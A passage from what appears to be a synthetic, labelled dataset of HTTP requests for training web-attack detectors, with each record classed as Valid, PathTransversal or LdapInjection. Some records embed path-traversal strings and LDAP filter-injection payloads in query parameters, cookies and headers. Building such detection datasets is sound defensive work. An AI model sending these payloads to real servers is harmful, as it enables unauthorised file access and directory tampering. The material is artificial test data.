User-Agent: Mozilla/6.4 (Machintosh; U; PPC 3.2; et-t8; rv:4.6.7) Gecko/90057470
UA-CPU: PowerPC
UA-Disp: 2543,113,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 428x5679
Via: HTTP/5.8 69.132.95.155
Transfer-Encoding: rJc3L
Upgrade: 2eglrr/4.5, A52ic/9.9, ntnlr/5.9, lahWl/8.7
Warning: 577 www.soDnr.shtml "epcbtilItta9ssLe" 
X-Forwarded-For: 209.213.51.4
X-Serial-Number: 7592797493312
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 19714
Start - Id: 45686
class: PathTransversal
GET /1m.html?Gzlvk=sfCMGJ&ya49me5egMg=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fellaetra%2Fsiisetnere%2Ftaalatne%2Fchicat.cgi&uhec=iDfslike+or&teUweer1mtE=rsTnNznsswpafErn&t7icawu=litssp9&gt7tunrmgeeleic=dstutle&tlw=rkyoLounionw HTTP/1.0
Host: www.diarr.biz
Connection: re7uxws
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.8, gzip;q=0.7
Accept-Language: *
Cache-Control: min-fresh=165
Client-ip: 10.24.0.201
Cookie: tv=8l;selectorNF8=C6n;UJU4G9EuW5H=osrcninnn;dmy7ag5Xuo5tejP=78395511
Cookie2: $Version="55"
Date: Mon, 03 May 10 08:28:52 UTC
ETag: "te5LXUt5O3OOLfUO"
Expect: to4thr
From: esIpsioy@eehlxsang.it
If-Modified-Since: Thu, 15 Nov 07 02:26:29 CET
If-Unmodified-Since: Tue, 18 Jul 06 02:20:19 CET
If-Match: "OdEyfn9cObmoLLWhM3A"
If-None-Match: *
If-Range: Sat, 17 Nov 07 16:02:42 UTC
Max-Forwards: 9902
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Digest nc=dFd20C70
Authorization: Basic cmVnR3Jlbm46c21hYWs=
Range: -934,-807,-703421
Referer: http://www.enfyhhv.ch/piofaite.tar.gz
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/0.3 (X11; U; Open BSD i386 0.3; jh-hu; rv:4.8.7) Gecko/54715796
UA-CPU: StrongARM
UA-Disp: 3926,182,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 488x430
Via: FTP/1.0 98.252.135.141:259
Transfer-Encoding: compress
Upgrade: Weyge/4.5, 12qen/6.1, nL6/9.1, 0dpMle/5.5, aosm8/0.7
Warning: 416 www.s8no.css "erg5ewnaswmt7ceb" "Wed, 30 Jan 08 22:16:24 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45686
Start - Id: 37504
class: LdapInjection
GET /mBq2h/mIp/niIU@Pr5LWP_bnY@LRT/hhkVMsbIyblK0TizbGw/EgZ/cV/FPhome9_vwMvSE/5dhzkBaEqCbt_zmnona/ug5tDyxeuest/34oseoofnczch6aau/zfjson2r.php3?4khtytc8=gqtn0fss&ftpTUNnOiFhttpsJI1=40684&hol=goadRf3oism+t&yi=65429&5RnullpNjz=072294866&Kdun9eittcstgwr=7375&etraad=tt1npouoeduugtste7&fhbrhwI=394&FSelinkL6I=yuer&esitltpZ=oJhjvwo HTTP/1.0
Host: 241.67.162.142
Connection: keep-alive
Accept: audio/*, video/*, application/*
Accept-Charset: hz-gb-2312, shift_jis;q=0.9, windows-1258;q=0.7, x-mac-chinesetrad, cp-932
Accept-Encoding: compress, deflate;q=0.2, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 189.2.13.227
Cookie: 4tnetcat5m8Obgsound=)  (  |  (   cn=*o   'brien* )(mail=*o    'brien*   )  
Date: Mon, 24 May 04 14:17:13 CET
ETag: W/"zGWHqQJD9ZWZTby9"
If-Unmodified-Since: Mon, 20 Sep 04 17:07:29 UTC
Max-Forwards: 18
MIME-Version: 7.4
Pragma: btuod6='el'
Proxy-Authorization: m5uH oinouwOz=ztee
Authorization: kOgwG lggri=tneio
Referer: http://s9ie.gov/4eeas2/7owwnbtH/l2hEy/attsa.jpg
Trailer: Accept-Charset
User-Agent: re4cwFQY.A http://www.nmtTre0.org
UA-OS: Win9x
Via: FTP/5.0 www.uuiPax.js
Upgrade: n7l/4.4, ele/2.8, ssrd/1.7, upst/6.6
----: ----------------------

null

End - Id: 37504
Start - Id: 24978
class: Valid
GET /8yermeliraiEt/leir64xwKbig/05eyJ.@@/dpgLmKU9UkypyBtme2/eei1NrweWf1Ett8ddout/aRIVee/eOybfPos/esss90t/e9UpfzkxpvJzkPM/rq.htm?r8rtsiTtgvbge=ex82llenxrn HTTP/1.1
Host: 183.18.50.243
Connection: zls7ioe
Accept: */*
Accept-Charset: windows-1250, iso-8859-3;q=0.6, iso-8859-2, windows-1257;q=0.8, iso-8859-15
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=5
Client-ip: 176.214.183.63
Cookie: 4j9UD.E=600001922;tetoi=norkSseohwpj9am;eSedthDeeswse=na1e;ecr9SSodOtrc=wgeti$1ldipnetcate'me/tuad;seohebk=eF3.@5yOX1MU
Cookie2: $Version="6"
Date: Sun, 04 May 08 07:30:16 UTC
ETag: W/"xa7XLSuWBJkd6ub1c"
Expect: 100-continue
From: fuMo9@nrmr.net
If-Modified-Since: Sat, 24 May 08 11:53:11 UTC
If-Unmodified-Since: Wed, 25 Apr 07 13:57:47 GMT
If-Match: *
If-None-Match: "D7X1Y6pAGCAmYbN"
If-Range: "0iP1qD4fazm_h5sd"
Max-Forwards: 9
MIME-Version: 4.0
Pragma: Qh=odois
Proxy-Authorization: n39Msi agpv8i=to9rstt
Authorization: NTLM bWV0dHFpMWlxeG5hdkV0dWlNdHRudGV5cmRrMmV1YWVhdA==
Range: -67,790189-2941
Referer: /Inaf4t/enmeZ.mdb
TE: trailers,chunked;q=0.8
Trailer: If-Range
User-Agent: oPan6heoao6neinak
UA-CPU: StrongARM
UA-Disp: 7088,5005,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 729x285
Via: HTTP/4.7 www.gvew.htm:68565, 1.5 www.m01c.html, 7.3 92.162.79.138:3297
Transfer-Encoding: sl7EJ; vsnioyaa=iogti
Upgrade: hae/6.6, tnaNlo/3.6, ro4r/5.9
Warning: 586 www.xoesS.jpg "tereeuOoER" "Sun, 31 Oct 04 12:03:58 GMT"
X-Forwarded-For: 212.148.33.104
X-Serial-Number: 4634746
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24978
Start - Id: 28152
class: Valid
GET /5m/jQSYdL4YSoB9kv/sxX7ptbQCyLxaT_rF3X/szF2vtt@-S4t43x3mSq/Otor0eteV/jeJs.gif? HTTP/1.0
Host: www.Kehectemls.be
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: compress;q=0.4, deflate;q=0.8, gzip
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 32.181.97.184
Cookie: Zhg=1eAdreThEae;OnEhase=62096553;nhsiel3stspils=061637
Cookie2: $Version="3"
Date: Thu, 19 Aug 04 01:05:40 GMT
ETag: W/"jPYw.xLUDQy-6PstRi"
Expect: o1hE=3lnMdu;ne1eonns=D8g3
From: hsdsttm4@ahcqn.net
If-Modified-Since: Sun, 23 Jan 05 04:18:12 CET
If-Unmodified-Since: Thu, 04 Mar 10 10:09:20 UTC
If-Match: *
If-None-Match: "L0QIQBwOSqfZc-ZD5v2"
If-Range: *
Max-Forwards: 245
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: NTLM MWlOZWR1cm9kb29rb2Fldm9zeW9ydGFMaXVnZWNybmVGbXJlb2NOMWpyZGlnNVNv
Authorization: Digest nonce
Range: 5476-50235,729359-196
Referer: /tmLhe2c/a8teatw/iHaxsOOt/jhhabtd/0aeh.txt
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: ci1ootlo/0.1
UA-CPU: Sparc
UA-Disp: 166,4722,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 4261x691
Via: 6.5 29.129.240.56, HTTP/8.3 www.crTtq.html
Transfer-Encoding: gzip
Upgrade: imy6ei/5.1, rfee/6.2, egoe/6.4, tizE/1.8, 9wsmHe/9.2
Warning: 403 120.108.130.1 "ai8tfnnlo4okAislt" "Wed, 10 Jan 07 06:01:10 GMT"
X-Forwarded-For: 53.152.98.70
X-Serial-Number: 28548763
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 28152
Start - Id: 8263
class: Valid
GET /4sO/Tadpn74S0cikec/cvKkX6/qpwAXfinputaqid4aO8/eyzdYCxXDN.jpeg? HTTP/1.0
Host: 11.143.172.14
Connection: close
Accept: */*
Accept-Charset: iso-2022-jp;q=0.9, windows-1251;q=0.3
Accept-Encoding: *;q=0.4
Accept-Language: atf-oi;q=0.6, ol-tzvyIdeU, en6sOn-Hfrotr;q=0.8, iri-gea;q=0.2
Cache-Control: max-stale
Client-ip: 2.140.51.225
Cookie: pM4zbsexecG_-G=i9;D60-rIWfS=a1uAFPyd.u3;emNsf=tb2zinclude8tp;is7hnE2=hIthg3atT8ne;aadLidas=services;cae=936
Cookie2: $Version="1"
Date: Tue, 19 Aug 08 01:02:39 UTC
ETag: W/"OPjIuekjFKXicD8X1Iv6"
Expect: 100-continue
From: obst2@srgtiust.it
If-Modified-Since: Tue, 20 Dec 05 12:28:14 GMT
If-Unmodified-Since: Sat, 30 Sep 06 10:56:11 UTC
If-Match: "9vqsV@CzYPHFnDM6"
If-None-Match: *
If-Range: "Upmz0vTkbk9OzZYjKaXQ"
Max-Forwards: 7
MIME-Version: 1.1
Pragma: EoubM4nd='t8ntba'
Proxy-Authorization: NTLM ZXNlaDRyaHNiMlNpMDV3YnVodGx1SGkzb2dhc3RpZW5FdHJoYmRyb28=
Authorization: NTLM ZGhzc2lpdG5lZ2lScHNvdHVtc3lpUnROQ2dzaWVsdWVuY2xp
Range: 245681-56,307766-2495,67-9
Referer: /ni16nmoo.sh
TE: chunked;q=0.9,trailers
Trailer: Cache-Control
User-Agent: nltgzu/9.6
UA-CPU: StrongARM
UA-Disp: 260,910,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 833x678
Via: 3.6 www.rtbulte.css
Transfer-Encoding: compress
Upgrade: S1pan/7.7, ubun/2.1
Warning: 511 www.4eiedl.jpg "iyeseuen99unse7mytth" 
X-Forwarded-For: 180.145.13.167
X-Serial-Number: 05009270
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 8263
Start - Id: 16139
class: Valid
GET /lmnuDuplbs/euScE.f69.exe?iUSblrjLa3ttn=nEionzeeeD%2Banhe&1lkhmuzpkr7=hK8w&r52Pt=%3C%3Am&A@JrR-tR@=tFkirO+u&h7ja3hro=0&sMmCvEKUESa.=ie&ojoDqtoen6a1l=hls+35d6mhadLou%26&6csewhhen=letWs&v95gunesese499I=i6-&nvaqensX=46173543&replaceWKIXGQYc=+%3D&nrnafs=nDm9pBu&rleuT=xMlZ9&aterd=seo&ucewtercTot=29360 HTTP/1.0
Host: www.acaa.be
Connection: uil3S
Accept: application/x-tar;q=0.5
Accept-Charset: koi8
Accept-Encoding: compress, gzip;q=0.2
Accept-Language: l2e7d35-ae4aaslr, I4Efnde-t4kne;q=0.8, lEUqifad-Sna8fnr
Cache-Control: no-cache
Client-ip: 110.65.78.110
Cookie: a0=vh;pEzLyulh=i.6G3ETS5;2otterhphl=gxp_@/r
Cookie2: $Version="550"
Date: Fri, 21 Apr 06 13:08:16 GMT
ETag: "DmIPd3.5oykWdKWDL6"
Expect: 100-continue
From: e1imeiR@cgsaTxypc.st
If-Modified-Since: Sun, 10 Oct 04 09:53:59 CET
If-Unmodified-Since: Tue, 14 Nov 06 15:48:42 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 29 Nov 08 01:35:36 CET
Max-Forwards: 045
MIME-Version: 1.5
Pragma: 5tr=ne
Proxy-Authorization: Digest opaque="PcngeE"
Authorization: pdct 2nOvrmp=yanfl
Range: 396-,06-480,6-
Referer: /nDaionAi/Oif4xrFw.cfm
TE: trailers,chunked;q=0.5,chunked
Trailer: Pragma
User-Agent: uwnrWth (rKaRJj5kH3; ewLCcbOJxD)
UA-CPU: MIPS
UA-Disp: 235,1889,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 846x8936
Via: pEwklg/4.3 180.7.244.230, FTP/9.8 144.29.80.228
Transfer-Encoding: deflate
Upgrade: 0n1no/3.8, a1ogu/4.2, nz7eem/1.9, srsgz1/5.5, krtea6/0.1
Warning: 819 www.htahn.html "47kuswi" "Thu, 19 May 05 07:26:39 UTC"
X-Forwarded-For: 45.149.45.168
X-Serial-Number: 38500847837
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 16139
Start - Id: 37335
class: LdapInjection
GET /g2R/aHsM1z-mh1UJr13KD/ttauIrneith0c/txCfDd-PNJurV9HR/io9/wrisDScnu/fE/0FA780O/tooibd89NeLc2nht.php3?hyt8onroLdotja=5&wdrn=ea-eLr2E&pThkaaceespseri=izuditeHsleoa5rm&yX4Am1p21T8=+%29where&eQ9iries=%24%2B+%7E HTTP/1.0
Host: www.voelt.ch
Connection: ctbth
Accept: */*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: compress, deflate
Accept-Language: )   (  |    (feEo=vEfd*)
Cache-Control: max-age=33907
Client-ip: 131.232.136.148
Cookie: t1jmail4y-m4b9v=7inasrntae5lhNo;rpetsoDtg=|o6sisttp4R9;mooyoeo=eutyodayphpf;f5lJ=ntOytwtr 
Cookie2: $Version="052"
Date: Wed, 01 Mar 06 12:02:21 UTC
ETag: W/"NJ1.2WEgk_6awsr54"
Expect: 100-continue
From: ddtp@lesT.org
If-Modified-Since: Tue, 17 May 05 06:56:24 GMT
If-Unmodified-Since: Mon, 01 Mar 04 19:06:46 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 21 Oct 04 03:37:35 GMT
Max-Forwards: 92
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: lsrrid nactta1e=moee
Authorization: leaN5 tobtnry7=2diiyo
Range: 06765-95986,-6,-81
Referer: http://www.oinooc.de/natdtrEO/lfekTs2a.php3
TE: gzip,trailers,trailers
Trailer: Range
User-Agent: Mozilla/5.0 (compatible; Konqueror/6.8; Linux i386; ibrwn; iaRhNuEese; etLbalqm0E)
UA-CPU: 68000
UA-Disp: 544,018,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 495x1616
Via: 0.6 178.121.21.218, HTTP/6.0 www.Dei5.html
Transfer-Encoding: deflate
Upgrade: o3106M/9.9, E9rle4/4.1, oohnne/6.6, eelrde/4.9, Ix7ea/1.8
Warning: 644 www.kr8o.htm "Jnrqtdtsr4kgdnb5i" "Fri, 25 Aug 06 23:03:26 GMT"
X-Forwarded-For: 255.193.19.186
X-Serial-Number: 06549032
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37335
Start - Id: 1890
class: Valid
GET /Oq5KhcIconnectcxKQYt2.gif?7MenO4reiiq=hsdmo&vT7ahAeea1anheN=sBe1&tanndiavealq=8435618&aTrfOl8dhtsCcib=nlibm+s&1jP-QKx=t&l-qU4EL9bkp=aloa1wccoAnecfadto HTTP/1.0
Host: www.fn8asua.be
Connection: yisnh
Accept: */*;q=0.7
Accept-Charset: windows-1253, x-mac-arabic
Accept-Encoding: *;q=0.5
Accept-Language: r-a;q=0.8, cvmeb-doxYvtde;q=0.4, mief-tsaha, a9aess8c-m3tei;q=0.5
Cache-Control: no-transform
Client-ip: 205.134.67.82
Cookie: y5=okttsrRoY|tegqymzw;b1lntmNrhnoqi=ha;triteauddt
Cookie2: $Version="3"
Date: Sat, 14 Jun 08 04:03:09 CET
ETag: "w0VM5BWpK4A5p.gOkTD"
Expect: Eubl
From: drTutr@dotdhai.com
If-Modified-Since: Sat, 03 Sep 05 16:34:17 CET
If-Unmodified-Since: Sat, 02 Apr 05 23:31:16 GMT
If-Match: *
If-None-Match: "i60SjvObjIWfHAm"
If-Range: "REZLPC_5LwXfbJ8_rq"
Max-Forwards: 0379
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic dHBvODpHdkRkcklvRA==
Range: -943,-739,0-64
Referer: /Teospco/plrn5sff/schl.php
TE: chunked,trailers
Trailer: Expect
User-Agent: Mozilla/5.6 (compatible; eionn; Open BSD i386; epnirftb; 4Tuzrl8e)
UA-CPU: PowerPC
UA-Disp: 272,378,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 722x920
Via: 6.7 180.230.33.106, FTP/8.5 www.roapi.html
Transfer-Encoding: deflate
Upgrade: tomf/2.5, DFma/1.5
Warning: 806 106.232.113.72:8602 "hRQia" 
X-Forwarded-For: 96.142.115.10
X-Serial-Number: 54871844
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 1890
Start - Id: 17927
class: Valid
GET /xAdzawc/nKZ/VB/s0aBucmV8M3.xLHa5nZ9/ee1eenaose9xd/4rdYKeimetamv/ydN_S2ERGF/4J/qu.js?RMSnbLOErm=%3B4m&trwn=oY0j&q0hxM0m6=266&eoneeUjla4=smariUnefveuo&aPTcn=rslYC4P3kk&ur4emn0soos=8&Hse=enaj5uett&aseot=sc8f&systemvrfgx2HK7Si=moheehhrnoeIi&FPj8NAn=h3sgn9aR2e HTTP/1.0
Host: www.l7birr.uk
Connection: eopsrer2
Accept: */*
Accept-Charset: iso-8859-5;q=0.1, windows-1254, utf-8;q=0.7, x-mac-arabic
Accept-Encoding: deflate, deflate;q=0.0, deflate, gzip
Accept-Language: teeRp-rel, jai0no01-l, Sbrhedy-nec;q=0.4, nmep-etnxv2zh;q=0.8, eotafer-ieuv
Cache-Control: no-cache
Client-ip: 200.145.185.234
Cookie: mahznxruiUu=c;tpuA7=7854;j-IzVPQhavinggroup by5q=lsg.cr1o
Cookie2: $Version="9"
Date: Thu, 03 Sep 09 16:30:23 GMT
ETag: "zli2-5gEo_z.hpe@Pf"
Expect: ehxeonbf
From: 5eetcI@n8lRomisoe.st
If-Modified-Since: Thu, 07 Oct 04 02:49:18 CET
If-Unmodified-Since: Sat, 04 Oct 08 03:45:04 UTC
If-Match: *
If-None-Match: "1CYY2HPOIoPL9rF"
If-Range: Mon, 14 Nov 05 12:11:00 UTC
Max-Forwards: 87
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Basic cXluY1NlYzpic3p0dTdt
Authorization: NTLM N2l0eWhleHJ0d2hzc0QxYjZ0Y2VsbWFmZTRIMGVlMDNkb25FaGVlVGVVZW9sZWVj
Range: 05-,-776516,-07
Referer: http://l2ad.org/t4zm0k.php3
TE: chunked,trailers,trailers
Trailer: Max-Forwards
User-Agent: radtda/9.2.9.9.3
UA-CPU: Sparc
UA-Disp: 427,601,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 523x1389
Via: 5.0 126.132.170.178:0037, 0.2 www.haiityrs.js:8
Transfer-Encoding: identity
Upgrade: e7uehc/9.0, le2xw/9.8, miatr/5.7
Warning: 811 8.238.208.132 "oayc7e2eesA2nuA" 
X-Forwarded-For: 188.200.228.132
X-Serial-Number: 8381908250645
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 17927
Start - Id: 15935
class: Valid
GET /elaht9e/ie/otzBTXONcO/ENerLiD/eiglOyns/goy7mel1cb/te-gtMYqQtR..cfm?noes3ore=40&rata7mr=rNVqia.4&earasiro=rqY-&tsjwsleemjanlh=0a&0mE=allob%26sgNHNb&5Bfimgcboot.ini=q.a&shokhn3roeLro=lmn&tdair68n4=suiaaraiohuaoo&crkbetweenoSEEiyU=6358 HTTP/1.0
Host: www.nentUWr.cz:35273
Connection: 1ehowncn
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: deflate;q=0.5, identity, gzip;q=0.0, compress;q=0.8
Accept-Language: AlE-so;q=0.1
Cache-Control: max-stale
Client-ip: 80.167.167.42
Cookie: 6hh=snoMPl;ssBR2g=5;41=dei;liswbwdkua4amh=ewhere4wnmochaiiErO;rebd9ltSn=wAe
Cookie2: $Version="589"
Date: Tue, 09 May 06 06:46:49 GMT
ETag: "09Z@qXdgqn32Nh1uT"
Expect: 100-continue
From: dejt@eiwqestde.org
If-Modified-Since: Tue, 04 Jul 06 19:59:48 GMT
If-Unmodified-Since: Fri, 01 May 09 12:48:46 GMT
If-Match: *
If-None-Match: *
If-Range: "An@0FSEr@crbuGwx_4o"
Max-Forwards: 428
MIME-Version: 6.6
Pragma: StwSTs='emEfnshF'
Proxy-Authorization: Basic OU5Ucmk1OnNzRWxh
Authorization: Digest realm
Range: -08,0744-,-43437
Referer: http://rHesWFuo.st/itwg/dsdrh/htut/heiens.php
TE: chunked;q=0.0,chunked;q=0.6
Trailer: Trailer
User-Agent: Mozilla/8.7 (X11; U; Linux i386 8.6; so-mp; rv:1.2.2) Gecko/25662004
UA-CPU: Sparc
UA-Disp: 9960,6267,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7490x6757
Via: 5.6 149.62.180.210
Transfer-Encoding: compress
Upgrade: nbf6oi/8.6, oqeh/3.0
Warning: 569 45.208.202.175 "ndwuots3cenlor" 
X-Forwarded-For: 34.10.5.61
X-Serial-Number: 902795825
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15935
Start - Id: 21925
class: Valid
GET /aamh/lAY5uKZdMdkw3yHFm8/tCIibLaYQSJ/1VEdT/bgsound5include/t6rbtpx74bojgnYrnl0d/opCP_HvDzy_qDixr/seithheslsodqgLe/ThjEedk/Wp/eti.cfm?rnDezoat=5455&c-XDnph-=60&9ray@qall2@=40&snph-dY=s HTTP/1.1
Host: www.inrdtye.gov:6083
Connection: close
Accept: audio/x-wav, video/mpeg
Accept-Charset: windows-1254;q=0.6, iso-8859-7, iso-8859-9, x-mac-roman
Accept-Encoding: gzip, deflate;q=0.7, identity;q=0.4
Accept-Language: 9jral-MaRfd;q=0.8, 5nitdZ-btjbgfka
Cache-Control: max-stale
Client-ip: 173.173.55.126
Cookie: oSeoToo3antSrm=iEeer5tn?
Cookie2: $Version="934"
Date: Tue, 23 Jun 09 04:06:07 GMT
ETag: W/"XM6wxA4_U4sd4oar7"
Expect: 100-continue
From: eregee@ddutgEiyN.be
If-Modified-Since: Fri, 05 Jun 09 11:32:18 UTC
If-Unmodified-Since: Tue, 16 Oct 07 24:58:22 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 88
MIME-Version: 3.8
Pragma: ry6ot0mD='Fahaw'
Proxy-Authorization: Basic YXBiYTpqZW1r
Authorization: Basic NmFOaHo6YW1vbQ==
Range: -6
Referer: /srd6plkd/4ms3tyl.pl
TE: trailers,chunked;q=0.2,trailers
Trailer: Referer
User-Agent: Mozilla/9.6 (compatible; Konqueror/2.3; Open BSD i386; 9iiA)
UA-CPU: x86
UA-Disp: 964,7426,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6616x2901
Via: 8.7 184.114.181.36:47389
Transfer-Encoding: deflate
Upgrade: safnU/4.6, n6yed/2.8, sose/6.4, kunjdz/3.4, uagadt/9.1
Warning: 706 118.112.66.251 "faTC6" "Thu, 05 Oct 06 20:03:57 UTC"
X-Forwarded-For: 153.220.121.189
X-Serial-Number: 09176432061314
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21925
Start - Id: 22815
class: Valid
GET /wymI.htm?uhDM3=965183&0C3group byRdo3a-i7=ualeoodrc&isetxdo2=3621037&O6Kc5M=e0NohpV&mochaCfromIrvAL=0&618rtrqobAobsio=0469076471&5aan=araUangu HTTP/1.1
Host: www.sdon.cz
Connection: eilsileb
Accept: text/*;q=0.6, audio/x-wav
Accept-Charset: *
Accept-Encoding: *
Accept-Language: KEk-dn;q=0.8, iReer-sAhiqg6q;q=0.6, aDmes-gs9d8;q=0.9
Cache-Control: only-if-cached
Client-ip: 173.3.239.168
Cookie: Athi=rh eno[liEon84ddgeH;hyc7nooentaSy1=qlteh1kep;mloolN=Osres(e b%Mh@=u;rsEss7t4=passthru;k2ap=otaT=;hineuIrrO=mdhyeDh2iloe
Cookie2: $Version="7"
Date: Mon, 27 Feb 06 10:12:00 UTC
ETag: "dy1SQ24-L8Gq_7JD"
Expect: 100-continue
From: ixeeaea8@ttdinp.org
If-Modified-Since: Tue, 06 Jan 04 15:28:27 UTC
If-Unmodified-Since: Sun, 04 Jul 04 13:19:13 CET
If-Match: *
If-None-Match: *
If-Range: "72eGl73A_DZIS6XyVo"
Max-Forwards: 3
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic YzFTb1RyYXM6MVRubm94bmk=
Authorization: Basic dWZ3aXJ0YWg6bWFodHNlZQ==
Range: -637
Referer: /olaer.html
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.0 (Windows; U; Win 9x 3.1; be-2g; rv:5.9.0) Gecko/02052275
UA-CPU: 68000
UA-Disp: 335,445,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 612x9972
Via: 5.3 www.a1emld.gif, eu7nE/0.4 www.wheeates.html, 9.3 www.chrd2z.jpg
Transfer-Encoding: deflate
Upgrade: nlNDj/4.6
Warning: 800 240.77.225.63 "td5atf" 
X-Forwarded-For: 143.162.53.229
X-Serial-Number: 8712140
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22815
Start - Id: 9621
class: Valid
GET /eucWafMeD9KhZBn.sh?r9rbyIFwt8nw=09581&rit14eecc9l=ixtermh+1meefe%5C1&HcbdHzoeswEC=netcati&svkl8=oZ4XGT6&izefitYl=9519&aeotnaf7zei=prodboot.iniTu&ratarErxusga=wmosnoyyhryc2teom&nlkehs=0&DEaw3hkttOa=477&uT7etbflm=17&lqohdpr=66925&oothe8jmt9nsx=t6oEnljLeeihoasEa&ttaapecpa3d5a=aidr-Te HTTP/1.1
Host: 181.106.69.70
Connection: keep-alive
Accept: video/mpeg;q=0.7, video/quicktime;q=0.1, video/quicktime;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: aqxsyri-mon;q=0.5, tTtiio1t-cs, mirdd1-s;q=0.9
Cache-Control: max-stale=28
Client-ip: 192.221.57.112
Cookie: fettuhraoUd=gneR;iT=dfoh$;iiMDnotcna5lHq=ar;ocyc=emeseuz|j(fxe>O6nns;rimh=lbmcbam;nwoal9sg8foN5a=h
Cookie2: $Version="43"
Date: Sun, 24 Jan 10 11:54:45 GMT
ETag: W/"K4@O.cegRPvtQa-Yp"
Expect: 100-continue
From: yiJqeaa@9hauhsGph.fr
If-Modified-Since: Fri, 14 Mar 08 07:19:34 GMT
If-Unmodified-Since: Fri, 03 Dec 04 01:45:24 GMT
If-Match: *
If-None-Match: "MSRxGVzn738hJ0gwQL3E"
If-Range: *
Max-Forwards: 9
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: NTLM cHd6c0Nycm90dHVoZWxsaGVobmZ0U3RlN2R4cDF6cmRkZXNrZ29zdDg=
Authorization: Digest nc=A0E8816f
Range: -72733
Referer: /vesn/8mri5t/soep/c7i5kseb/bu7l.sh
TE: trailers,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.6 (compatible; Konqueror/5.2; Open BSD i586; oaslrwl)
UA-CPU: Sparc
UA-Disp: 8659,744,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7520x0183
Via: 3.8 www.nnhns1Au.jpg:2624
Transfer-Encoding: h3lu; hfgn=Celinys
Upgrade: lss/2.6, toctms/3.0, 7uOy2O/0.2, cosw/9.9
Warning: 004 www.qaG5rro.jpeg "9mp7el34osnrooE0a" "Sat, 23 Aug 08 06:38:14 CET"
X-Forwarded-For: 34.115.88.196
X-Serial-Number: 04486
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9621
Start - Id: 38076
class: LdapInjection
GET /f2y/eeeudKt0h/m@Y5UJ_uYdQ.E/cexeceaIdscriptmeta/iIBe7vDV-ILY0JTNJGPo/ijbE/wtqsloai.js?REgteRg0hoeined=scz8l&teaise0g=oywoh%29%28%7C++%28ezan%3D*%29&15includeidzjHhNO=%3Dih+neprocessing-instructions2t&it=47623671&kjsd=948&zhm@-2fperlX=sock_streame0ddme+ns2pp&hbee=aZ5K.cC&snt19izzdnsrdR=o0Onn+e%26&z45Ost=Htuyi&@t3https=znrsejalsrAe&ga=ncusntto&tayp=n&cjoptAfI26=766951583&ueanaanscn=fSoid HTTP/1.0
Host: 251.177.137.242:4
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: oy0-i, cirodTI-u;q=0.4, lent-sdf;q=0.9, o-i9;q=0.4, Rn8lwE-rcosnpg;q=0.0
Cache-Control: no-store
Client-ip: 114.76.49.126
Cookie: X-TUfd4MJv=libEsr;tums=hQvd9
Cookie2: $Version="542"
Date: Sun, 28 Sep 08 16:40:26 CET
ETag: W/"U@VOO-@zJ@agtuM4rW"
Expect: 100-continue
From: zfmmsal@ymhqo.ch
If-Modified-Since: Sun, 04 Dec 05 03:27:45 GMT
If-Unmodified-Since: Thu, 21 Jun 07 21:27:27 CET
If-Match: "A@DAaO7.-B@lAppr7"
If-None-Match: "ubuvWY1Vl3AJgZ8maMTo"
